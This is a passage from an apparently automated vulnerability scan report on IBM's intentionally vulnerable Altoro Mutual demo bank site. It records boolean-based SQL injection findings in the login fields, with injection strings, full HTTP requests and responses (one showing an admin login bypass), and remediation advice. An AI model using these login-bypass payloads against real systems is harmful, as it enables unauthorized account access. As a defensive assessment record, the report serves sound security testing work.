Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 155 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net:8080/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 156 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 157 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 158 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 159 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 160 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 161 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 162 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 163 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 164 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 165 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 166 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117:8080/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 167 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 168 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 169 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 170 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 171 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 172 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 173 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 174 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 175 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 176 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 177 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:34:47 GMT
Connection: close
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 178 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:34:47 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 179 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 180 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 181 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 182 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 183 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 184 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 185 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 186 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 187 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 188 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:31:43 GMT
Connection: close
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 189 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:31:43 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 190 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 191 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 192 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 193 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 194 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 195 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 196 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 197 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 198 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 199 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117:8080/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6706
Date: Tue, 06 Aug 2019 04:35:47 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 200 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 201 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 202 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 203 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 204 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>
</div>
</td>
</div>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 205 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 206 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
False Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:35:47 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 207 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 208 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 209 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 210 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 211 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 212 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
